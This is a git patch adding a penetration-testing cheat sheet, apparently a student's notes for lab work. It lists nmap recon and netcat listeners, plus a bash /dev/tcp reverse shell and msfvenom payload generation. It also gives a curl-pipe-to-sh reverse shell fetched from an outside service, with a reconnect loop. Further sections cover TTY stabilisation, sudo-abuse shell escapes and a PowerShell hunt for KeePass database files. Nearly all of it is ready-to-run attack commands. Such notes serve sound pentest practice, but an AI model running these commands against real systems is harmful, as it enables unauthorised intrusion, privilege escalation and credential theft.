From ad56aad266f0777963146f955a5b59b0dd5c5cfc Mon Sep 17 00:00:00 2001
From: Rh17S15 <136891969+Rh17S15@users.noreply.github.com>
Date: Mon, 28 Jul 2025 09:30:28 +0200
Subject: [PATCH] links

---
 Cheatsheet.md | 3 +
 Cheatsheet.org | 245 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 248 insertions(+)
 create mode 100644 Cheatsheet.org

diff --git a/Cheatsheet.md b/Cheatsheet.md
index b034611..10526dc 100644
--- a/Cheatsheet.md
+++ b/Cheatsheet.md
@@ -337,3 +337,6 @@ sudo mysql -e ’! /bin/sh’
 strace -o /dev/null /bin/sh
 sudo awk ’BEGIN {system(“/bin/sh”)}’
+https://nextcloud.th-deg.de/s/ex5yzQ6NtGeKp32
+https://github.com/Obedaya/scripts
+https://mygit.th-deg.de/lg06087/pentesting
diff --git a/Cheatsheet.org b/Cheatsheet.org
new file mode 100644
index 0000000..97777a1
--- /dev/null
+++ b/Cheatsheet.org
@@ -0,0 +1,245 @@
+**** to install:
+ - magic wormhole
+ - tldr
+ - rlwrap
+ -
+
+#+BEGIN_SRC bash
+sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
+#+END_SRC
+**** for keyring
+-> if there is some kind of keyring error
+#+BEGIN_SRC bash
+sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
+#+END_SRC
+
+* information gathering
+
+*** nmap
+
+for quick scan of available ips
+#+BEGIN_SRC bash
+nmap -sn ip/24
+#+END_SRC
+to filter output for open ips
+
+#+BEGIN_SRC bash
+nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
+#+END_SRC
+
+scan open ports:
+#+BEGIN_SRC bash
+nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
+#+END_SRC
+*** dirb
+#+BEGIN_SRC bash
+dirb http://ip
+#+END_SRC
+**** bei windows
+#+BEGIN_SRC bash
+nmap --vuln ip
+#+END_SRC
+***** bei windows \+ smb
+
+#+BEGIN_SRC bash
+nmap --script smb-vuln* ip
+#+END_SRC
+
+* inital access
+*** start listener:
+#+BEGIN_SRC bash
+rlwrap -cAr nc -nlvp 9002
+#+END_SRC
+*** reverse shell bash:
+#+BEGIN_SRC bash
+/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
+#+END_SRC
+*** reverse shell file:
+#+BEGIN_SRC bash
+msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
+#+END_SRC
+-> from revshells.com
+
+*** untested:
+ Reverse Shell as a Service
+
+ 1. On your machine:
+#+BEGIN_SRC bash
+ nc -l 1337
+ or nlvp?
+#+END_SRC
+
+ 2. On the target machine:
+#+BEGIN_SRC bash
+ curl https://reverse-shell.sh/yourip:1337 | sh
+#+END_SRC
+
+
+**** reconnecting:
+#+BEGIN_SRC bash
+while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
+#+END_SRC
+
+* privilege escalation
+** always run these:
+#+BEGIN_SRC bash
+sudo -l
+#+END_SRC
+if sudo doesn't work:
+[[*TTY Spawn Shell]]
+
+**** check cronjobs
+#+BEGIN_SRC bash
+ls /etc/cron.*
+crontab -l
+#+END_SRC
+
+** TTY Spawn Shell
+***** if sudo still doesn't work
+use
+#+BEGIN_SRC bash
+sudo -S command
+#+END_SRC
+
+Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
+*** Python spawn shell
+
+#+BEGIN_SRC bash
+python -c 'import pty; pty.spawn("/bin/bash")'
+#+END_SRC
+Fully Interactive TTY
+**** All the steps to stabilize your shell
+
+**The first step:**
+
+#+BEGIN_SRC bash
+python3 -c 'import pty;pty.spawn("/bin/bash")'
+#+END_SRC
+
+Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys.
+
+**Step two is:**
+
+#+BEGIN_SRC bash
+export TERM=xterm
+#+END_SRC
+
+This will give us access to term commands such as clear.
+
+**Finally (and most importantly) we will background the shell using**
+
+#+BEGIN_SRC bash
+Ctrl + Z
+#+END_SRC
+
+Back in our own terminal we use
+
+#+BEGIN_SRC bash
+stty raw -echo; fg
+#+END_SRC
+
+This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
+
+#+BEGIN_SRC bash
+stty rows 38 columns 116
+#+END_SRC
+*** OS system spawn shell
+
+#+BEGIN_SRC bash
+echo os.system("/bin/bash")
+#+END_SRC
+*** Bash spawn shell
+
+#+BEGIN_SRC bash
+/bin/sh -i
+#+END_SRC
+*** Perl spawn shell
+
+#+BEGIN_SRC bash
+perl —e 'exec "/bin/sh";'
+#+END_SRC
+*** Ruby spawn shell
+
+ruby: exec "/bin/sh"
+
+*** Lua spawn shell
+
+lua: os.execute("/bin/sh")
+
+*** IRB spawn shell
+
+exec "/bin/sh"
+
+*** VI spawn shell
+
+#+BEGIN_SRC bash
+:!bash
+#+END_SRC
+*** VI(2) spawn shell
+
+#+BEGIN_SRC bash
+:set shell=/bin/bash:shell
+#+END_SRC
+*** Nmap spawn shell
+
+#+BEGIN_SRC bash
+!sh
+#+END_SRC
+
+**** Exiftools
+
+Metadaten auslesen:
+
+#+BEGIN_SRC bash
+exiftool picture.png
+#+END_SRC
+
+Binwalk (Binary Daten exportieren):
+
+#+BEGIN_SRC bash
+binwalk -e picture.png
+#+END_SRC
+
+
+
+* Windows
+*** WinPEAS
+https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
+*** LOLBAS
+https://lolbas-project.github.io/#
+*** WADCOMS
+https://wadcoms.github.io/
+*** PrivescCheck Script as an alternative to WinPEAS
+https://github.com/itm4n/PrivescCheck
+
+*** RUN these while the other scripts are working
+#+BEGIN_SRC powershell
+whoami /priv
+
+whoami /all
+
+schtasks /query
+#+END_SRC
+
+*** for finding kbdx Files
+https://github.com/ivanmrsulja/keepass2john
+#+BEGIN_SRC powershell
+Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
+#+END_SRC
+
+
+
+
+quick Wins Linux:
+gdb -nx -ex '!sh' -ex quit
+sudo mysql -e '! /bin/sh'
+strace -o /dev/null /bin/sh
+sudo awk 'BEGIN {system("/bin/sh")}'
+
+
+evilwinrm
+quick Wins Linux:
+gdb -nx -ex '!sh' -ex quit
+sudo mysql -e '! /bin/sh'
+strace -o /dev/null /bin/sh
+sudo awk 'BEGIN {system("/bin/sh")}'